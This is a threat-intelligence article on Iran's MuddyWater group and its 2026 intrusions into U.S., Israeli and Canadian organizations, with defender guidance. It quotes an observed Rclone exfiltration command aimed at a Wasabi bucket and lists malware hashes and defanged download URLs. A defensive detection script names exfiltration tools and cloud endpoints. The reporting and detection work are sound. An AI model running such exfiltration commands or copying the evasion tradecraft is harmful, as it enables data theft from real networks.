Already Inside: How Iran's MuddyWater APT Quietly Embedded Itself in U.S. Critical Infrastructure

While the world was watching missiles, Iran's persistent hacking group was already on the inside. Researchers confirmed in early March that MuddyWater—the Iranian state-sponsored APT linked to the country's intelligence ministry—has been quietly embedded in the networks of a U.S. bank, a U.S. airport, a defense software company, and a Canadian nonprofit since at least February 2026. The campaign did not begin after the military strikes. It was running long before them.

The disclosure landed on March 5, 2026, via an intelligence report from Broadcom's Symantec and Carbon Black Threat Hunter Team. The timing made headlines because it coincided with the aftermath of a U.S.-Israeli military operation—codenamed Operation Epic Fury by the U.S. and Operation Roaring Lion by Israel—that killed Iran's Supreme Leader Ayatollah Ali Khamenei. But the more unsettling detail buried in the report is that MuddyWater's presence on these U.S. networks predates any of that by weeks. The group was not reacting to the strikes. It was already positioned.

This article pulls together the technical disclosures, the broader operational picture, and the historical pattern of behavior that makes this campaign worth understanding in full. The combination of new custom malware, cloud-based exfiltration attempts, AI-assisted development, exposed operational infrastructure, and an explicit link between cyber reconnaissance and physical strikes tells a story that goes well beyond a typical espionage operation.

Who Is MuddyWater / Seedworm?

Before getting into the specifics of the 2026 campaign, it helps to understand exactly who this group is and why they have been on researchers' radar for nearly a decade.

MuddyWater operates under a constellation of names across different threat intelligence vendors: Seedworm, Static Kitten, Mango Sandstorm, Mercury, Temp Zagros, TA450, Earth Vetala, MUDDYCOAST, Boggy Serpens, Cobalt Ulster, and Yellow Nix, among others. Independent researchers and MITRE ATT&CK trace the group's activity back to at least 2017. A 2022 joint advisory from the FBI, CISA, U.S. Cyber National Mission Force, the NSA, and the UK's National Cyber Security Centre formally attributed MuddyWater to Iran's Ministry of Intelligence and Security (MOIS), describing the group as a subordinate element operating within that structure and noting it had conducted broad cyber campaigns on MOIS's behalf since approximately 2018.

The group started with a relatively narrow focus on Middle Eastern targets—telecommunications companies, government ministries, and oil and gas organizations. Over time, that scope expanded significantly to include organizations across Asia, Africa, Europe, and North America, spanning sectors that include defense, local government, critical infrastructure, academic institutions, and financial services.

What makes MuddyWater operationally significant is not just the breadth of its targets but its tooling philosophy. The group is known for developing its own custom malware while simultaneously using legitimate administrative tools—a technique defenders call "living off the land"—to blend in with normal network traffic. Tools like PowerShell, Remote Desktop Protocol, screen capture utilities, and commercial remote monitoring tools like SimpleHelp and ConnectWise appear regularly across MuddyWater intrusions, making attribution and detection considerably harder.

Iran's broader cyber capabilities add important context here. UltraViolet Cyber, a practitioner-led MSSP, assessed in March 2026 that Iran's cyber operations have become a reliable tool for intelligence gathering, regional influence, and strategic messaging during periods of geopolitical tension. That is the framing that matters. MuddyWater is not a loosely affiliated hacktivist collective. It is a structured intelligence operation, and its campaigns are designed to serve strategic objectives, not score points on social media.

The 2026 U.S. Campaign: What Was Discovered

The Symantec and Carbon Black Threat Hunter Team published their findings on March 5, 2026, after a third party shared indicators of compromise linked to MuddyWater. According to senior intelligence analyst Brigid O Gorman, one of those indicators led the team to uncover the broader cluster of attacks and identify additional malware.

The confirmed list of affected organizations includes a U.S. bank, a U.S. airport, the Israeli branch of a software company that supplies technology to the defense and aerospace industries, a U.S.-based non-governmental organization, and a Canadian non-profit organization. The names of the affected organizations were not disclosed.

The activity began in early February 2026—weeks before the U.S.-Israeli strikes on Iran at the end of the month. Activity continued in the days following the strikes, meaning the group did not pause or go quiet after the military escalation. It kept operating.

Attribution Note

The FBI, CISA, NSA, and UK NCSC have formally attributed MuddyWater to Iran's MOIS. The Symantec and Carbon Black team confirmed attribution in this campaign through certificate reuse linking new malware samples to previously confirmed MuddyWater tooling. Microsoft and Kaspersky independently detected samples associated with the Stagecomp and Darkcomp malware families using MuddyWater-linked signatures. The SHA-256 hash for the Dindoor backdoor has been published publicly: 0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542.

Researchers said the Israeli branch of the defense software company appeared to be the primary target, with other organizations potentially serving as staging grounds or secondary intelligence objectives. The software company's U.S. and Israeli operations both showed signs of intrusion, raising questions about whether the attackers were pursuing supply chain access—compromising the vendor in order to reach its government and defense clients downstream.

On the question of exfiltration, researchers identified a concrete attempt to copy data from the software company's systems using Rclone, a legitimate file-transfer utility, pointed at a Wasabi cloud storage bucket. Symantec noted in their report that it remains unclear whether the exfiltration attempt succeeded. Symantec also stated that the observed activity has been disrupted, but warned that other organizations may still be vulnerable to compromise. The use of a commercial cloud storage provider for data staging is a deliberate evasion technique—traffic to Wasabi blends in with normal enterprise cloud activity far more easily than traffic to a suspicious IP address.

The initial access vector remains unknown. The Symantec and Carbon Black team confirmed they do not know how MuddyWater gained entry to the affected networks. O Gorman told The Register that the group typically uses phishing emails or exploits in public-facing applications. Both vectors should be assumed operational until defenders confirm otherwise.

The New Malware: Dindoor, Fakeset, and a Rapidly Expanding Toolkit

The technical centerpiece of this campaign is a previously unknown backdoor that Symantec and Carbon Black named Dindoor. Understanding what makes it distinctive requires a look at how it was built and how it is tied back to MuddyWater's established infrastructure.

Dindoor

Dindoor was found on the networks of the Israeli software company, the U.S. bank, and a Canadian non-profit. The backdoor uses Deno—a modern, secure runtime for JavaScript and TypeScript—for execution. This is an unconventional choice. SC Media noted that this reliance on Deno and Python runtimes suggests MuddyWater is shifting toward cross-platform, living-off-the-land approaches to bypass traditional endpoint detection. Using Deno gives the backdoor a degree of novelty that can complicate detection by security tools tuned to familiar patterns.

The backdoor was signed with a digital certificate issued to "Amy Cherne." Certificate signing is significant because it grants the malware a veneer of legitimacy—signed code is less likely to trigger immediate security alerts on systems configured to trust signed binaries.

Fakeset

A second, separate Python-based backdoor called Fakeset was found on the networks of the U.S. airport and a U.S. non-profit. It was signed with certificates issued to "Amy Cherne" and "Donald Gay." The Donald Gay certificate is the critical attribution link: it had previously been used to sign Stagecomp and Darkcomp malware, both of which have been linked to MuddyWater by Google, Microsoft, and Kaspersky. Fakeset was downloaded from servers belonging to Backblaze, another commercial cloud storage provider—the same evasion logic as the Wasabi exfiltration attempt. Legitimate cloud infrastructure, blended traffic.

The split in tooling across victim categories is clean and consistent. Dindoor was deployed against the Israeli software company arm, the U.S. bank, and the Canadian nonprofit. Fakeset was deployed against the U.S. airport and the U.S.-based nonprofit. Using different backdoors for different target categories within the same campaign may reflect organizational compartmentalization inside MuddyWater, with different sub-teams or working groups handling different objectives, or a deliberate effort to impede cross-victim correlation by security researchers. Defenders looking for only one backdoor will miss the other half of the campaign.

The reuse of signing certificates across Fakeset, Stagecomp, and Darkcomp provided the attribution thread that linked the new campaign to Seedworm—even where the specific malware families had not previously been seen on the targeted networks. — Symantec and Carbon Black Threat Hunter Team, March 2026, as reported by The Register
# Fakeset download infrastructure observed by researchers
# Backdoor retrieved from Backblaze commercial cloud servers:
#   hxxps://gitempire.s3.us-east-005.backblazeb2[.]com
#   hxxps://elvenforest.s3.us-east-005.backblazeb2[.]com
#
# Certificate "Donald Gay" - previously linked to:
#   Stagecomp malware (MuddyWater, confirmed by Google/Microsoft/Kaspersky)
#   Darkcomp backdoor (MuddyWater, confirmed)
# Certificate "Amy Cherne" - used across both Dindoor and Fakeset
#
# Dindoor hashes (Trojan.Dindoor):
# 0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542
# c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e
#
# Fakeset hashes (Trojan.Fakeset) - select samples published by Broadcom/Symantec:
# 077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de
# 15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84
# 2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6
# 4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be
# 64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb
#
# Rclone exfiltration command observed:
# rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x
#
# Source: Broadcom/Symantec Threat Hunter Team (security.com), March 2026

Certificate reuse is a double-edged sword for threat actors. It simplifies operations and allows signed binaries to bypass certain endpoint controls, but it also creates a persistent attribution thread. Once researchers identify a certificate linked to a known actor, every future sample signed with that certificate becomes a data point—regardless of whether the malware family is entirely new. MuddyWater's continued reuse of the Amy Cherne and Donald Gay certificates suggests the group calculated that operational efficiency outweighed the detection risk. That calculus may change as more defenders add these certificates to watchlists.

Operation Olalampo: A Parallel Campaign Already in Motion

The U.S. infrastructure campaign does not exist in isolation. MuddyWater has been running a parallel, highly active campaign targeting organizations across the Middle East and North Africa (MENA) region, which Group-IB formally named Operation Olalampo.

Group-IB first observed Olalampo on January 26, 2026, and published a detailed technical analysis in February. The campaign deployed four new malware families, each serving a distinct role in a modular attack chain. This is worth paying attention to because the tooling in Olalampo overlaps structurally with the U.S. campaign—they share the same operational DNA, even when the specific binaries differ.

The first stage is GhostFetch, a downloader that profiles the victim system before doing anything else—checking for mouse movement, screen resolution, debuggers, virtual machines, and installed antivirus products. If the environment looks like a sandbox, GhostFetch stops. If it looks real, it fetches and executes secondary payloads directly in memory to avoid leaving files on disk. GhostBackDoor follows as the second-stage implant, offering an interactive shell with file read and write capabilities and the ability to re-launch GhostFetch if needed, enabling the attackers to refresh their foothold.

HTTP_VIP is a native downloader that conducts system reconnaissance and connects to an external server to authenticate before deploying AnyDesk—a legitimate remote administration tool—from the command-and-control server. Using AnyDesk for persistence is a classic living-off-the-land technique. It is a real application that many organizations use legitimately, which makes its presence far harder to flag as malicious.

The fourth component is CHAR, a Rust-based backdoor with a particularly unusual command-and-control mechanism: it is controlled through a Telegram bot named "stager_51_bot" with the display name "Olalampo." Telegram-based C2 infrastructure is increasingly common among Iranian threat actors because it routes traffic through a legitimate, encrypted platform that is difficult to block without significant collateral impact on normal communications. CHAR shares a similar structure and development environment with the Rust-based malware BlackBeard (also tracked as Archer RAT and RUSTRIC), which CloudSEK and Seqrite Labs previously identified as another MuddyWater tool targeting Middle Eastern organizations.

Group-IB's assessment of Operation Olalampo concluded that MuddyWater's continued integration of AI tools alongside new custom malware families signals an intent to broaden its operational reach, not consolidate it. The group is developing custom tooling in parallel with rapid adoption of public exploit code, deploying both at scale. — Group-IB Threat Intelligence Team, Operation Olalampo analysis, February 2026

The Group-IB team made a particularly striking observation about CHAR: analysis of its source code revealed debug strings containing emojis, which researchers interpret as evidence of AI-assisted development. This is not as speculative as it might sound. Google had previously disclosed that MuddyWater was experimenting with generative AI tools to assist malware development. Group-IB identified four distinct instances of this pattern and noted that the operators apparently failed to sanitize the debug strings before compilation. The presence of emoji artifacts in debug strings is a known fingerprint of large language model output when used for code generation—LLMs include them naturally in ways that human developers typically do not.

Group-IB also gained an unusual window into MuddyWater's operational methods by monitoring the Telegram bot used in the campaign. Bot logs revealed that the threat actor had tested the CHAR backdoor on their own machine prior to deployment, with usernames "DontAsk" and "Jacob" visible in the artifact trail. The hostname was desktop-9524r2b—an ordinary-sounding machine, not a hardened operations server. The same "Jacob" username appeared in Rust library paths consistent with the BlackBeard malware attributed to MuddyWater. These operational security failures are rare gifts for defenders and researchers, and they strengthened attribution confidence significantly.

The Telegram bot's activity also exposed limited historical usage dating to late 2025, indicating infrastructure reuse rather than a new standalone operation. This is a pattern: MuddyWater builds persistent infrastructure and recycles it across campaigns, which means burned indicators from Olalampo may help detect activity across other campaigns the group is running simultaneously.

The Exposed Infrastructure: What Ctrl-Alt-Intel Found

While Symantec and Group-IB were tracking the malware, an independent threat intelligence collective called Ctrl-Alt-Intel took a different approach. They went hunting for exposed MuddyWater infrastructure—and found it.

Ctrl-Alt-Intel identified and dumped C2 tooling, scripts, logs, victim data, and operational artifacts from a VPS hosted in the Netherlands that they attributed to MuddyWater with high confidence. The exposure was not the result of a law enforcement operation or a vendor disclosure. It was the result of repeated operational security failures by MuddyWater's own operators, which allowed researchers to pivot using Hunt.io and identify additional related infrastructure.

What they found inside paints a broader operational picture than any single vendor report has provided. The server contained three distinct custom-developed C2 frameworks. The first, which Ctrl-Alt-Intel named KeyC2, is a Python-based framework operating over UDP on port 1269 that handles command execution, file transfer, and dynamic C2 migration. The second, PersianC2, uses HTTP polling with a dashboard interface and configurable sleep timers for staging operations. The third—ArenaC2—is an HTTP-based framework using FastAPI and AES-256-CBC encryption that presented a decoy landing page disguised as a multilingual news site called "ArenaReport" when visited through a browser, complete with animated backgrounds and content in English, French, and German, specifically designed to fool automated scanners and casual inspection.

The server also hosted what Ctrl-Alt-Intel called a "Tsundere Botnet"—a Node.js-based implant that uses Ethereum smart contracts for command-and-control. Rather than beaconing to a static server address, the botnet resolves its C2 address by querying a smart contract on the Ethereum blockchain. This technique makes infrastructure takedown extremely difficult: there is no server to seize or domain to sinkhole when the command address lives on a decentralized ledger. Researchers at Kaspersky had independently documented the Tsundere botnet architecture in November 2025 in a separate context, but the Ctrl-Alt-Intel findings mark its first confirmed appearance in a MuddyWater operation.

For network pivoting, MuddyWater operators were observed using Neo-reGeorg, resocks, and revsocks (SOCKS and WebSocket tunneling tools) after dropping webshells onto a compromised Exchange server in Portugal—a reminder that MuddyWater's European targeting is not hypothetical. Exfiltration channels extended beyond Wasabi to include put.io and an Amazon EC2 instance, giving the operators multiple fallback paths for data removal.

The victim data recovered from the exposed server revealed targeting of Israeli organizations spanning healthcare, hosting, immigration, and intelligence sectors. EgyptAir was among the targeted entities—researchers recovered copies of passports, visa documents, and financial files from the server—along with Jordanian government webmail, various UAE companies, U.S. entities, and Jewish- and Israeli-linked non-governmental organizations. Ctrl-Alt-Intel also found evidence that MuddyWater had compromised the Iranian marketplace BaSalam—consistent with the MOIS's documented mandate for domestic surveillance, and a reminder that the Iranian regime's cyber operations target their own population in addition to foreign adversaries.

The exposed infrastructure showed exploitation of over a dozen CVEs, including novel SQL injection vulnerabilities. MuddyWater was observed scanning for targets vulnerable to CVE-2026-1281, an Ivanti EPMM vulnerability, using Nuclei—a widely used vulnerability scanning framework. They also conducted password spraying against Outlook Web Access and SMTP services. Ctrl-Alt-Intel concluded that what stood out in this operation was not the sophistication of any single tool, but the operational breadth: countless organizations targeted across multiple continents, running in parallel across three distinct C2 frameworks simultaneously.

Why This Matters for Defenders

The Ctrl-Alt-Intel findings are significant because they reveal the scale of concurrent MuddyWater operations. The U.S. bank, airport, and software company intrusions disclosed by Symantec are not isolated incidents. They are part of a much wider campaign that spans multiple continents, multiple C2 frameworks, and multiple victim categories running in parallel. Defenders looking only at the Dindoor and Fakeset indicators are seeing a fraction of the threat surface.

The CCTV Precedent: When Cyber Reconnaissance Feeds Kinetic Strikes

The concern about MuddyWater's current accesses in U.S. infrastructure is not abstract. It is grounded in what the group did with its access in 2025, and what that history says about the potential use of current footholds.

In May 2025, MuddyWater compromised a server containing live CCTV streams from cameras across Jerusalem. The group used that access to surveil the city, monitoring movements and locations of potential targets. On June 23, 2025, Iran launched widespread missile attacks against Israel, including Jerusalem. On the same day, the Israel National Cyber Directorate publicly disclosed that Iranian forces had been exploiting compromised security cameras to assess where missiles hit and improve their targeting precision.

This is not a hypothetical or theoretical risk. It happened. Cyber access translated directly into targeting data for kinetic strikes. A compromised camera network became a battlefield intelligence system.

The connection between cyber compromise and kinetic consequences went even further during the February 2026 strikes. The Financial Times reported that Israeli intelligence agencies had hacked into Tehran's extensive traffic camera network for years to monitor the movements of bodyguards belonging to Khamenei and other top officials—surveillance that reportedly helped enable the airstrike that killed the Supreme Leader. Cyber access feeding kinetic targeting is no longer a one-directional threat. It is the operating model on both sides of this conflict.

"Even if the motive wasn't disruption originally, it's possible that groups such as Seedworm could pivot in response to the war and launch disruptive attacks on organizations they've already compromised. Already having a presence on US and Israeli networks prior to the current hostilities beginning places the threat group in a potentially dangerous position to launch attacks." — Brigid O Gorman, Senior Intelligence Analyst, Symantec and Carbon Black, as reported by The Register, March 2026

That assessment should be read carefully. O Gorman is not speculating about whether MuddyWater could theoretically pivot to destructive operations. She is saying they are already positioned to do so, right now, on networks they have had access to since February. The gap between intelligence gathering and disruption is a policy decision, not a technical obstacle.

The airport intrusion deserves particular attention in this context. Airports are complex operational technology environments. They run industrial control systems for luggage handling, fuel management, runway lighting, and ground communications. An adversary with persistent access to an airport network is not just sitting on email servers. Depending on network segmentation, they may have pathways toward operational systems that have very direct physical consequences.

Why This Campaign Is More Dangerous Than It Looks

Taken individually, the technical components of this campaign are consistent with what MuddyWater has done before: custom malware, living-off-the-land tools, phishing or public-facing application exploitation for initial access, and data exfiltration attempts staged through commercial cloud providers. None of that is novel in isolation.

What makes the current situation more dangerous is the convergence of several factors happening simultaneously.

First, the geopolitical context has removed the normal constraints on escalation. A U.S.-Israeli military operation that killed Iran's Supreme Leader and at least 40 senior officials is not a minor provocation. It is the kind of event that historically triggers sustained, retaliatory cyber campaigns. MuddyWater was already positioned before the strikes. The question now is whether it holds, expands, or pivots. BeyondTrust's threat advisory noted that the elimination of Iran's senior leadership has not neutralized its cyber capability—it has likely decentralized it, with pre-positioned proxy groups now operating in what researchers assessed as the highest-motivation environment in their recorded history.

Second, the broader Iranian cyber ecosystem has activated at scale. Palo Alto Networks' Unit 42 reported approximately 60 hacktivist groups active as of March 2, 2026, including pro-Russian groups joining in support of Iran. CloudSEK documented over 150 hacktivist incidents between February 28 and March 1 alone. According to Flashpoint, a massive #OpIsrael cyber campaign involving pro-Russian and pro-Iranian actors has targeted Israeli industrial control systems and government portals across Kuwait, Jordan, and Bahrain. The campaign involves groups including NoName057(16), Handala Hack, Fatemiyoun Electronic Team, and the Cyber Islamic Resistance. Pro-Russian hacktivist group Z-Pentest claimed compromises of U.S. industrial control systems and SCADA networks between February 28 and March 2. MuddyWater's quiet, persistent campaign sits inside a much louder and more chaotic threat landscape, which makes detection harder for defenders already overwhelmed with signal.

Third, the supply chain angle of the software company compromise has not received enough attention. The targeted firm supplies technology to defense and aerospace industries. If attackers can use their presence on the vendor's network to push malicious code or credentials upstream to government and defense clients, the blast radius of this intrusion expands dramatically beyond the named organizations. This is the same category of risk as SolarWinds: a trusted vendor becomes a vector into protected networks.

Fourth, the tooling has matured significantly. The Rust-based CHAR backdoor, AI-assisted development artifacts, Telegram-based C2, Ethereum smart contract infrastructure, multiple parallel C2 frameworks, and the modular architecture of Operation Olalampo are not the work of a group still finding its footing. MuddyWater in 2026 is a substantially more capable actor than MuddyWater in 2018. As ESET noted in late 2025, the group's recent upgrades—including memory-only loaders, custom backdoors, and advanced defense evasion techniques—represented a significant departure from its historically noisier operational style. The group's willingness to invest in new malware families while maintaining operational continuity across campaigns demonstrates an institutional sophistication that pure criminal groups rarely achieve.

Fifth, there is an additional Rust-based malware family in play. Rescana identified what they call RustyWater, a remote access trojan targeting Israeli government, military, financial, telecommunications, and maritime organizations. RustyWater uses spear-phishing with Hebrew-language decoy documents, establishes persistence through registry modifications, and communicates with C2 servers over HTTP/HTTPS using domains mimicking legitimate services. This means defenders need to track not just the Symantec-disclosed tooling, but an expanding ecosystem of Rust-based implants that MuddyWater is deploying across multiple campaigns simultaneously.

Separately, a campaign beginning in August 2025 and published by Group-IB in October saw MuddyWater use a compromised legitimate mailbox to distribute the Phoenix backdoor to more than 100 government entities across the MENA region. A Chromium-based credential stealer disguised as a calculator application was also part of that toolkit. The credential theft angle matters because stolen credentials from one campaign become initial access for the next one—the group has a documented pattern of recycling and building on prior intrusions.

Sixth, U.S. cyber defense capacity is under strain at precisely the wrong moment. CISA—the federal agency responsible for tracking and alerting the public to threats like MuddyWater—has been operating with sharply reduced staffing due to a funding lapse. Congressional leaders and cybersecurity experts have warned publicly that this is a dangerous time for the nation's cyber defense agency to be running at reduced capacity. The Iranian cyber threat does not wait for staffing levels to recover.

What Defenders Should Actually Do Differently

Standard defensive checklists—patch your systems, run phishing simulations, monitor for indicators of compromise—are necessary but insufficient for an intrusion of this maturity and scope. MuddyWater has had weeks of dwell time in these environments. Standard prevention advice addresses a threat actor that is still trying to get in. This threat actor is already inside. The defensive posture needs to match that reality.

  1. Assume compromise and hunt backward from persistence, not forward from initial access. The initial access vector is still unknown. That means prevention-focused controls like patching and phishing awareness, while critical, cannot be your primary response. The priority is hunting for evidence that persistence has already been established. Look for newly created services (MuddyWater has used service names like "MicrosoftVersionUpdater" in Olalampo), modified startup folder registry paths, and unauthorized remote administration tools. Hunt for evidence of Deno runtime or Python interpreters in locations where they were not previously installed.
  2. Monitor for legitimate tools used maliciously—and build behavioral baselines to distinguish them. Rclone appearing in an environment that does not use it is a meaningful indicator. Unexpected AnyDesk installations, Plink usage, or outbound connections to Backblaze or Wasabi from systems that have no business reason to use them are all worth investigating. But simple blocklisting is not enough when the adversary uses tools your own teams might use. Build behavioral baselines: which machines normally use remote administration tools, which users normally transfer files to cloud storage, and which processes normally execute JavaScript runtimes. Anomalies against that baseline are your signal.
  3. Certificate and hash-based indicators should be deployed immediately, but understood as perishable. The Dindoor backdoor hash is publicly published. The certificate names "Amy Cherne" and "Donald Gay" should be added to watchlists. Backblaze download URLs from gitempire and elvenforest subdomains are published IOCs. Known MuddyWater infrastructure IPs documented by Ctrl-Alt-Intel, Group-IB, and Symantec should be incorporated into threat intelligence feeds. But recognize that a group operating multiple parallel C2 frameworks will rotate infrastructure. These indicators catch yesterday's operation. Behavioral detection catches tomorrow's.
  4. Network segmentation must be validated, not assumed. If operational technology networks are reachable from IT networks, the risk profile of this campaign escalates dramatically. Lateral movement from a compromised email server to a SCADA environment is possible in flat networks. For airports, utilities, defense suppliers, and financial institutions, this is not a theoretical concern—the CCTV precedent from 2025 demonstrates exactly how cyber access translates to physical consequences. Conduct segmentation validation testing, not just architecture review. Verify that the boundaries hold under adversary conditions, not just under normal operations.
  5. Implement cloud exfiltration monitoring with explicit attention to commercial storage providers. The use of Wasabi and Backblaze for staging and delivery is deliberate. Organizations should have visibility into which commercial cloud storage platforms their systems communicate with and flag anomalous transfers, especially involving archive creation followed by outbound upload. Consider implementing data loss prevention rules specifically for known cloud storage endpoints that are not part of your sanctioned toolset. Monitor for Rclone command-line usage patterns, particularly targeting external buckets.
  6. Monitor for Telegram and blockchain-based C2 traffic. The CHAR backdoor's use of Telegram for command-and-control, and the Tsundere Botnet's use of Ethereum smart contracts, represent C2 channels that many enterprise detection stacks are not configured to identify. Telegram API traffic from server environments, and unexpected Ethereum RPC connections from endpoints, should be treated as anomalous. These are not typical IOCs—they are behavioral patterns that require specific detection logic.
  7. Prioritize identity security and credential hygiene. MuddyWater's operational playbook consistently includes credential harvesting, password spraying, and reuse of stolen credentials across campaigns. The Chromium-based credential stealer found in their October 2025 toolkit targets Chrome, Edge, Brave, and Opera. Enforce multi-factor authentication across all remote access. Audit for password reuse. Review whether service accounts have been added or modified without authorization. Assume that credentials harvested in one campaign will be tested against your environment in the next.
  8. Engage in threat intelligence sharing, not just consumption. The Ctrl-Alt-Intel findings demonstrate the value of active hunting for adversary infrastructure. If your organization discovers indicators linked to MuddyWater or related Iranian APTs, sharing them through ISACs, CISA, or trusted intelligence-sharing communities accelerates detection for everyone. MuddyWater operates at scale across dozens of organizations simultaneously. Isolated defense is insufficient against a campaign of this breadth.
  9. Treat IoT devices and networked cameras as part of your core security perimeter. The CCTV precedent from 2025 is not a one-time anomaly. Field Effect's analysis of the broader Iranian cyber campaign confirms that multiple IRGC-linked groups have been systematically compromising camera networks in Israel, Iraq, and Gulf states through unpatched firmware, weak credentials, and exposed interfaces. If your organization operates physical security systems, building management systems, or any IoT-adjacent infrastructure, these devices must be inventoried, segmented, and monitored the same way your servers are. An adversary with access to your camera network has access to physical intelligence, and depending on network architecture, may have a path into adjacent systems.
  10. Perform adversary simulation against your current detection stack, not last year's. The specific evasion techniques in this campaign—Deno runtime, Ethereum-based C2, Telegram C2, cloud storage exfiltration to commercial providers, use of signed binaries—each represent a category of detection gap that many enterprise security stacks are not configured to address. Running tabletop exercises against a MuddyWater-style intrusion (initial access via unknown vector, custom signed backdoor, cloud-native exfiltration, blockchain C2 resolution) would expose specific gaps in your environment before a real intrusion does. Purple team exercises using the published Olalampo and Dindoor TTPs are a concrete action organizations can take now that goes well beyond adding IOCs to a feed.
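Recommendations 2, 5 and 6 above all come down to the same detection pattern: know which hosts normally use which tools and cloud destinations, then alert on deviations and on archive-then-upload sequences. The following is an added illustration, not code from the report or any vendor; the host names, binary names, provider domains and telemetry are constructed assumptions standing in for Rclone, AnyDesk, Plink, Deno and Backblaze, Wasabi and Telegram API traffic.

```python
from collections import defaultdict

# Assumed binary names and provider domain suffixes (not IOCs from the report).
WATCHED_TOOLS = {"rclone.exe", "anydesk.exe", "plink.exe", "deno.exe"}
ARCHIVERS = {"7z.exe", "rar.exe", "tar.exe"}
WATCHED_DOMAINS = ("backblazeb2.com", "wasabisys.com", "api.telegram.org")
UPLOAD_WINDOW = 600  # seconds: archive creation followed by an upload within this is flagged

def _watched_dest(dest):
    return any(dest == d or dest.endswith("." + d) for d in WATCHED_DOMAINS)

def build_baseline(events):
    """Per-host set of watched tools and cloud destinations seen in a clean learning window."""
    baseline = defaultdict(set)
    for e in events:
        if e["kind"] == "process" and e["image"] in WATCHED_TOOLS:
            baseline[e["host"]].add(("tool", e["image"]))
        elif e["kind"] == "network" and _watched_dest(e["dest"]):
            baseline[e["host"]].add(("dest", e["dest"]))
    return baseline

def detect(events, baseline):
    """Return (host, rule, value) findings: baseline deviations and archive-then-upload."""
    findings, last_archive = [], {}  # last_archive: host -> ts of latest archiver run
    for e in sorted(events, key=lambda x: x["ts"]):
        host, known = e["host"], baseline.get(e["host"], set())
        if e["kind"] == "process":
            if e["image"] in ARCHIVERS:
                last_archive[host] = e["ts"]
            if e["image"] in WATCHED_TOOLS and ("tool", e["image"]) not in known:
                findings.append((host, "unbaselined-tool", e["image"]))
        elif e["kind"] == "network" and _watched_dest(e["dest"]):
            if ("dest", e["dest"]) not in known:
                findings.append((host, "unbaselined-cloud-dest", e["dest"]))
            if host in last_archive and e["ts"] - last_archive[host] <= UPLOAD_WINDOW:
                findings.append((host, "archive-then-upload", e["dest"]))
    return findings

# Constructed telemetry: backup01 legitimately runs rclone to Backblaze; mail01 and web02 do not.
LEARNING = [{"ts": 100, "host": "backup01", "kind": "process", "image": "rclone.exe"},
            {"ts": 101, "host": "backup01", "kind": "network", "dest": "api.backblazeb2.com"}]
LIVE = [{"ts": 5000, "host": "backup01", "kind": "process", "image": "rclone.exe"},
        {"ts": 5001, "host": "backup01", "kind": "network", "dest": "api.backblazeb2.com"},
        {"ts": 6000, "host": "mail01", "kind": "process", "image": "7z.exe"},
        {"ts": 6120, "host": "mail01", "kind": "process", "image": "rclone.exe"},
        {"ts": 6125, "host": "mail01", "kind": "network", "dest": "s3.wasabisys.com"},
        {"ts": 7000, "host": "web02", "kind": "process", "image": "deno.exe"},
        {"ts": 7001, "host": "web02", "kind": "network", "dest": "api.telegram.org"}]
print(*detect(LIVE, build_baseline(LEARNING)), sep="\n")
```

The baselined backup host produces no alert, while the mail server's 7-Zip run followed by Rclone to Wasabi and the web server's Deno process beaconing to the Telegram API each surface as findings.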

The Questions That Are Not Being Asked

The public reporting on this campaign has focused primarily on the malware, the certificates, and the geopolitical context. That reporting is accurate and valuable. But several important questions are conspicuously absent from the conversation.

Why is a Canadian nonprofit on this target list? The inclusion of a Canadian nonprofit in the same campaign as a U.S. bank, a U.S. airport, and a defense software supplier raises a question no public reporting has addressed. Canadian nonprofits linked to Jewish community organizations, Middle Eastern diaspora advocacy, or Iran-related human rights work are documented MOIS targets—the ministry has a pattern of surveilling and disrupting diaspora communities outside Iran. Alternatively, a Canadian nonprofit may have been targeted for lateral access into the networks of partner organizations, donors, or government contacts it maintains. The selection is not random. MOIS targets with purpose, and understanding why this particular organization was selected would illuminate the operational objective behind the entire campaign in a way the more headline-grabbing bank and airport victims do not.

What does "disrupted" actually mean? Symantec and Carbon Black stated that the observed activity has been disrupted. No public reporting has defined what disruption entailed. Were the backdoors removed? Were affected organizations' networks isolated or reimaged? Were the Backblaze and Wasabi buckets used for C2 and exfiltration taken offline? Were all affected organizations notified, or only those the research team directly identified? Disruption of observed activity is not the same as eviction of the threat actor. A group that has had weeks of dwell time may have established persistence mechanisms that were not discovered before the disclosed backdoors were remediated. The gap between "we disrupted this activity" and "these networks are clean" can be substantial.

How many other organizations are compromised but have not yet been identified? Symantec and Carbon Black discovered this campaign because a third party shared an indicator that led them to it. That is a reactive discovery process. MuddyWater has been operating for weeks. The Ctrl-Alt-Intel findings show a victim list far broader than what Symantec disclosed. There is no reason to believe the known victims represent the full scope of compromise.

What is the strategic significance of the Deno runtime choice? The selection of Deno—rather than Python, PowerShell, or Node.js—for the Dindoor backdoor is technically deliberate and deserves more scrutiny than it has received. Deno is a modern JavaScript and TypeScript runtime that enforces explicit permission grants for filesystem access, network access, and environment variable access, running sandboxed by default. But that same modern design means it is far less commonly monitored by enterprise endpoint detection platforms. Detection rules, behavioral baselines, and SIEM signatures are built around known adversary tooling. Deno's relative obscurity in enterprise environments means an unexpected Deno process on a corporate system may not generate an alert in organizations that have not specifically hunted for it. The choice signals something about MuddyWater's detection-evasion research process: the group is actively identifying and exploiting gaps in what defenders are watching for.

What happens to these accesses if the conflict escalates further? O'Gorman's stated concern—that MuddyWater could pivot to disruptive attacks on already-compromised networks—is the critical strategic question. Iran's cyber operations have historically been designed to maintain optionality: gather intelligence, build access, and decide later whether to use it for espionage or disruption. The CCTV-to-airstrike example from 2025 demonstrated that this optionality is real and has already been exercised. But the public conversation has not grappled with what disruption of a U.S. airport or a bank's operational systems would actually look like, or what policy frameworks exist to deter it.

